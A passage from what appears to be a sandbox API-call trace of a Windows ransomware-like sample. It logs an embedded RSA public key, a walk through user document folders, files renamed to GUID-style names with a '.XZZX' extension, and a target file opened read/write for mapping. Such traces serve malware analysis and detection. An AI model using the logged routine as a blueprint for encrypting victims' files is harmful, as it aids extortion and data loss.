HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0178.783] SetErrorMode (uMode=0x1) returned 0x1 [0178.783] lstrcpyW (in: lpString1=0x2aaf860, lpString2="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX" | out: lpString1="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX") returned="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX" [0178.783] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x2886f586, Data2=0x914a, Data3=0x445b, Data4=([0]=0x80, [1]=0x9b, [2]=0x2, [3]=0x3a, [4]=0x11, [5]=0xf8, [6]=0xf6, [7]=0x33))) returned 0x0 [0178.783] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\DE6D908A0693B67D2F37324A0AAB9AC5.XZZX") returned 118 [0178.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0178.783] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\2813DEBC26CB4D4E2886F58629763196.XZZX") returned 118 [0178.783] StrStrW (lpFirst="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 638 os_tid = 0xa28 [0178.941] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0178.941] lstrcpyW (in: lpString1=0x2aaf460, lpString2="E3E55C1830B142FC6C2B225E34DE2744.XZZX" | out: lpString1="E3E55C1830B142FC6C2B225E34DE2744.XZZX") returned="E3E55C1830B142FC6C2B225E34DE2744.XZZX" [0178.941] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0178.941] SetErrorMode (uMode=0x1) returned 0x1 [0178.941] lstrcpyW (in: lpString1=0x2aaf860, lpString2="E3E55C1830B142FC6C2B225E34DE2744.XZZX" | out: lpString1="E3E55C1830B142FC6C2B225E34DE2744.XZZX") returned="E3E55C1830B142FC6C2B225E34DE2744.XZZX" [0178.941] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x88def4a0, Data2=0x7894, Data3=0x4a93, Data4=([0]=0xb3, [1]=0xa3, [2]=0xed, [3]=0xf8, [4]=0xb6, [5]=0x30, [6]=0xd5, [7]=0xf1))) returned 0x0 [0178.941] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\E3E55C1830B142FC6C2B225E34DE2744.XZZX") returned 118 [0178.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0178.941] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\A3906C80232004FC88DEF4A025CAE944.XZZX") returned 118 [0178.941] StrStrW (lpFirst="E3E55C1830B142FC6C2B225E34DE2744.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 639 os_tid = 0x1d4 [0179.095] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0179.095] lstrcpyW (in: lpString1=0x2aaf460, lpString2="F8F047460EB3954ECCCBC0D612CB7996.XZZX" | out: lpString1="F8F047460EB3954ECCCBC0D612CB7996.XZZX") returned="F8F047460EB3954ECCCBC0D612CB7996.XZZX" [0179.095] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0179.095] SetErrorMode (uMode=0x1) returned 0x1 [0179.095] lstrcpyW (in: lpString1=0x2aaf860, lpString2="F8F047460EB3954ECCCBC0D612CB7996.XZZX" | out: lpString1="F8F047460EB3954ECCCBC0D612CB7996.XZZX") returned="F8F047460EB3954ECCCBC0D612CB7996.XZZX" [0179.095] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x5fbab588, Data2=0x88d7, Data3=0x477e, Data4=([0]=0xb6, [1]=0xc2, [2]=0x78, [3]=0xe1, [4]=0x34, [5]=0xeb, [6]=0xc7, [7]=0xf6))) returned 0x0 [0179.095] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\F8F047460EB3954ECCCBC0D612CB7996.XZZX") returned 118 [0179.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0179.095] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\963EB5382636FAD25FBAB58828E1DF1A.XZZX") returned 118 [0179.095] StrStrW (lpFirst="F8F047460EB3954ECCCBC0D612CB7996.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 640 os_tid = 0x818 [0179.259] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0179.259] lstrcpyW (in: lpString1=0x2aaf460, lpString2="BF7B86490294F06B45AC44D706ACD4B3.XZZX" | out: lpString1="BF7B86490294F06B45AC44D706ACD4B3.XZZX") returned="BF7B86490294F06B45AC44D706ACD4B3.XZZX" [0179.259] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" [0179.260] SetErrorMode (uMode=0x1) returned 0x1 [0179.260] lstrcpyW (in: lpString1=0x2aaf860, lpString2="BF7B86490294F06B45AC44D706ACD4B3.XZZX" | out: lpString1="BF7B86490294F06B45AC44D706ACD4B3.XZZX") returned="BF7B86490294F06B45AC44D706ACD4B3.XZZX" [0179.260] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x52404642, Data2=0x2cc3, Data3=0x4042, Data4=([0]=0xb3, [1]=0xd7, [2]=0x85, [3]=0x9, [4]=0xc2, [5]=0x84, [6]=0x1d, [7]=0x46))) returned 0x0 [0179.260] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\BF7B86490294F06B45AC44D706ACD4B3.XZZX") returned 91 [0179.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0179.260] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\B308DC460B3C4A46524046420DE72E8E.XZZX") returned 91 [0179.260] StrStrW (lpFirst="BF7B86490294F06B45AC44D706ACD4B3.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 641 os_tid = 0x820 [0179.406] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0179.406] lstrcpyW (in: lpString1=0x2aaf460, lpString2="Favorites.vss" | out: lpString1="Favorites.vss") returned="Favorites.vss" [0179.406] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" [0179.406] SetErrorMode (uMode=0x1) returned 0x1 [0179.406] lstrcpyW (in: lpString1=0x2aaf860, lpString2="Favorites.vss" | out: lpString1="Favorites.vss") returned="Favorites.vss" [0179.406] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0xbe2f98d9, Data2=0xf67c, Data3=0x407a, Data4=([0]=0xac, [1]=0x1d, [2]=0x95, [3]=0x1f, [4]=0x29, [5]=0x1e, [6]=0x63, [7]=0x9b))) returned 0x0 [0179.406] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss") returned 67 [0179.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0179.406] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\DBEE8F1C3E147718BE2F98D940BF5B60.XZZX") returned 91 [0179.406] StrStrW (lpFirst="Favorites.vss", lpSrch="XZZX") returned 0x0 [0179.407] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss", dwFileAttributes=0x20) returned 1 [0179.407] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb04 [0179.407] CreateFileMappingW (hFile=0xb04, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x0 Thread: id = 642 os_tid = 0xc08 [0179.567] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0179.567] lstrcpyW (in: lpString1=0x2aaf460, lpString2="7B7BA3C4205941180FE9457124712560.XZZX" | out: lpString1="7B7BA3C4205941180FE9457124712560.XZZX") returned="7B7BA3C4205941180FE9457124712560.XZZX" [0179.567] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\" [0179.567] SetErrorMode (uMode=0x1) returned 0x1 [0179.567] lstrcpyW (in: lpString1=0x2aaf860, lpString2="7B7BA3C4205941180FE9457124712560.XZZX" | out: lpString1="7B7BA3C4205941180FE9457124712560.XZZX") returned="7B7BA3C4205941180FE9457124712560.XZZX" [0179.567] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0xe8add331, Data2=0x81fb, Data3=0x4804, Data4=([0]=0xa3, [1]=0x1d, [2]=0xb0, [3]=0xbe, [4]=0xac, [5]=0xd7, [6]=0xc7, [7]=0xca))) returned 0x0 [0179.567] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\7B7BA3C4205941180FE9457124712560.XZZX") returned 100 [0179.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0179.567] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\B9D9C20B24909FECE8ADD331273B8434.XZZX") returned 100 [0179.568] StrStrW (lpFirst="7B7BA3C4205941180FE9457124712560.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 643 os_tid = 0xc0c [0179.728] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0179.728] lstrcpyW (in: lpString1=0x2aaf460, lpString2="7BA753503E40D4C00F297B124258B908.XZZX" | out: lpString1="7BA753503E40D4C00F297B124258B908.XZZX") returned="7BA753503E40D4C00F297B124258B908.XZZX" [0179.728] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" [0179.728] SetErrorMode (uMode=0x1) returned 0x1 [0179.728] lstrcpyW (in: lpString1=0x2aaf860, lpString2="7BA753503E40D4C00F297B124258B908.XZZX" | out: lpString1="7BA753503E40D4C00F297B124258B908.XZZX") returned="7BA753503E40D4C00F297B124258B908.XZZX" [0179.728] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x463de443, Data2=0xc88e, Data3=0x4c20, Data4=([0]=0x82, [1]=0x2a, [2]=0x85, [3]=0x9e, [4]=0xab, [5]=0xc6, [6]=0xb0, [7]=0xce))) returned 0x0 [0179.728] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\7BA753503E40D4C00F297B124258B908.XZZX") returned 95 [0179.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0179.728] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\50A8F52A3BA339C0463DE4433E4E1E08.XZZX") returned 95 [0179.728] StrStrW (lpFirst="7BA753503E40D4C00F297B124258B908.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 644 os_tid = 0xc10 [0179.880] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0179.880] lstrcpyW (in: lpString1=0x2aaf460, lpString2="4645E01C4F3CCEC4EA018E655354B30C.XZZX" | out: lpString1="4645E01C4F3CCEC4EA018E655354B30C.XZZX") returned="4645E01C4F3CCEC4EA018E655354B30C.XZZX" [0179.880] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\" [0179.880] SetErrorMode (uMode=0x1) returned 0x1 [0179.880] lstrcpyW (in: lpString1=0x2aaf860, lpString2="4645E01C4F3CCEC4EA018E655354B30C.XZZX" | out: lpString1="4645E01C4F3CCEC4EA018E655354B30C.XZZX") returned="4645E01C4F3CCEC4EA018E655354B30C.XZZX" [0179.880] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x4189238f, Data2=0x2979, Data3=0x4658, Data4=([0]=0x95, [1]=0x46, [2]=0xe1, [3]=0xe2, [4]=0x60, [5]=0x96, [6]=0x87, [7]=0x7))) returned 0x0 [0179.880] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\4645E01C4F3CCEC4EA018E655354B30C.XZZX") returned 81 [0179.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0179.880] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\F083B5970B6557984189238F0E103BE0.XZZX") returned 81 [0179.880] StrStrW (lpFirst="4645E01C4F3CCEC4EA018E655354B30C.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 645 os_tid = 0xc14 [0180.034] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC 